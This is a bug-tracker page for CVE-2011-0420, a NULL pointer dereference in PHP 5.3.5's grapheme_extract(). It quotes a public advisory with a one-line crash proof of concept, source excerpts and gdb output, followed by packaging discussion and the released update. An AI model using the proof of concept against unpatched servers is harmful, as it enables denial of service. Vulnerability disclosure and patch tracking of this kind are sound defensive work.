Bugzilla – Bug 672933
VUL-1: CVE-2011-0420: php5: grapheme_extract() NULL Pointer Dereference
Last modified: 2020-05-18 11:52:26 UTC
Hi. There is a security bug in package 'php5'. This information is from 'full-disclosure'. This bug is public. There is no coordinated release date (CRD) set. More information can be found here: http://securityreason.com/ CVE number: CVE-2011-0420 CVE description: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0420 Original posting: ---------- Weitergeleitete Nachricht ---------- Betreff: [Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference Datum: Donnerstag 17 Februar 2011 Von: Maksymilian Arciemowicz <cxib@securityreason.com> An: full-disclosure@lists.grok.org.uk -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 09.12.2010 - - Pub.: 17.02.2011 CVE: CVE-2011-0420 CERT: VU#210829 Affected Software: - - PHP 5.3.5 Fixed: SVN Original URL: http://securityreason.com/achievement_securityalert/94 - --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. grapheme_extract ? Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8. - --- 1. PoC for grapheme_extract() --- grapheme_extract('a',-1); Change length of first parameter to change rip. - --- 2. grapheme_extract() NULL Pointer Dereference --- As we can see in grapheme_extract(str,size) - -grapheme_extract()-- .. if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) { <=== str='a' and size='-1' .. /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done. (size + 1 because the size-th character might be the beginning of a grapheme cluster) */ if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 ) === long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1 if ( NULL != next ) { ZVAL_LONG(next, start+nsize); } RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT } .. - -grapheme_extract()-- if we call to grapheme_ascii_check(pstr,0) where - -grapheme_ascii_check()-- /* {{{ grapheme_ascii_check: ASCII check */ int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0 { int ret_len = len; while ( len-- ) { if ( *day++ > 0x7f ) return -1; } return ret_len; <=== return 0 } - -grapheme_ascii_check()-- then we get (int)0 in result and long nsize = ( size < str_len ? size : str_len ); will be -1. Therefore, RETURN_STRINGL(((char *)pstr), nsize, 1); give NULL pointer dereference here. Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3). (gdb) r -r 'grapheme_extract('a',-1);' .. (gdb) x/i $rip => 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi) (gdb) x/x $rax 0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70 (gdb) x/x $rdi 0x11b2000: Cannot access memory at address 0x11b2000 (gdb) r -r 'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);' .. (gdb) x/i $rip => 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10 (gdb) x/x $rsi 0x11b1fe8: 0x00000000 - --- 3. Fix --- CVS http://svn.php.net/viewvc?view=revision&revision=306449 - --- 4. Greets --- Pierre, Stas, sp3x, infospec - --- 5. Contact --- Author: Maksymilian Arciemowicz [ SecurityReason.com ] Email: - - cxib {a\./t]securityreason[d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://cxib.net/ - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) <max@cxib.net> sub 4096R/58BA663C 2010-09-19 -----BEGIN PGP SIGNATURE----- iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81 imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf 7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9 EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN 9aCz02ztmFBMPO+/YTzb =H8sm -----END PGP SIGNATURE----- -------------------------------------------------------------
p5->p3 mass change
Re: PHP 5.3.5 grapheme_extract() NULL Pointer Dereference Von: Marcin Orlowski <carlos@wfmh.org.pl> An: bugtraq@securityfocus.com On Wed, 16 Feb 2011 16:11:23 -0700 cxib wrote: > Affected Software: > - PHP 5.3.5 grapheme is neither part of PHP core, nor built-in PHP extension, therefore above is false as bug is not in PHP itself. People using PHP 5.3.5 but not using grapheme (some distros like Debian and derrivatives offer this extension under name "php5-intl") are not vulnerable. Regards, -- "Daddy, what "Formatting drive C:" means?"... Marcin http://wfmh.org.pl/carlos/
We distribute php5-intl package only for 5.3 branch, that means 11.2, 11.3, 11.4 and Factory.
the php update from swamp 37389 is still running. What about including this bug?
Fine with me.
Please take a look at following submit requests: 11.2 #63641 11.3 #63642 Petr
Update released for: apache2-mod_php5, apache2-mod_php5-debuginfo, php5, php5-bcmath, php5-bcmath-debuginfo, php5-bz2, php5-bz2-debuginfo, php5-calendar, php5-calendar-debuginfo, php5-ctype, php5-ctype-debuginfo, php5-curl, php5-curl-debuginfo, php5-dba, php5-dba-debuginfo, php5-debuginfo, php5-debugsource, php5-devel, php5-dom, php5-dom-debuginfo, php5-enchant, php5-enchant-debuginfo, php5-exif, php5-exif-debuginfo, php5-fastcgi, php5-fastcgi-debuginfo, php5-fileinfo, php5-fileinfo-debuginfo, php5-ftp, php5-ftp-debuginfo, php5-gd, php5-gd-debuginfo, php5-gettext, php5-gettext-debuginfo, php5-gmp, php5-gmp-debuginfo, php5-hash, php5-hash-debuginfo, php5-iconv, php5-iconv-debuginfo, php5-imap, php5-imap-debuginfo, php5-intl, php5-intl-debuginfo, php5-json, php5-json-debuginfo, php5-ldap, php5-ldap-debuginfo, php5-mbstring, php5-mbstring-debuginfo, php5-mcrypt, php5-mcrypt-debuginfo, php5-mysql, php5-mysql-debuginfo, php5-odbc, php5-odbc-debuginfo, php5-openssl, php5-openssl-debuginfo, php5-pcntl, php5-pcntl-debuginfo, php5-pdo, php5-pdo-debuginfo, php5-pear, php5-pgsql, php5-pgsql-debuginfo, php5-phar, php5-phar-debuginfo, php5-posix, php5-posix-debuginfo, php5-pspell, php5-pspell-debuginfo, php5-readline, php5-readline-debuginfo, php5-shmop, php5-shmop-debuginfo, php5-snmp, php5-snmp-debuginfo, php5-soap, php5-soap-debuginfo, php5-sockets, php5-sockets-debuginfo, php5-sqlite, php5-sqlite-debuginfo, php5-suhosin, php5-suhosin-debuginfo, php5-sysvmsg, php5-sysvmsg-debuginfo, php5-sysvsem, php5-sysvsem-debuginfo, php5-sysvshm, php5-sysvshm-debuginfo, php5-tidy, php5-tidy-debuginfo, php5-tokenizer, php5-tokenizer-debuginfo, php5-wddx, php5-wddx-debuginfo, php5-xmlreader, php5-xmlreader-debuginfo, php5-xmlrpc, php5-xmlrpc-debuginfo, php5-xmlwriter, php5-xmlwriter-debuginfo, php5-xsl, php5-xsl-debuginfo, php5-zip, php5-zip-debuginfo, php5-zlib, php5-zlib-debuginfo Products: openSUSE 11.2 (debug, i586, x86_64) openSUSE 11.3 (debug, i586, x86_64)
released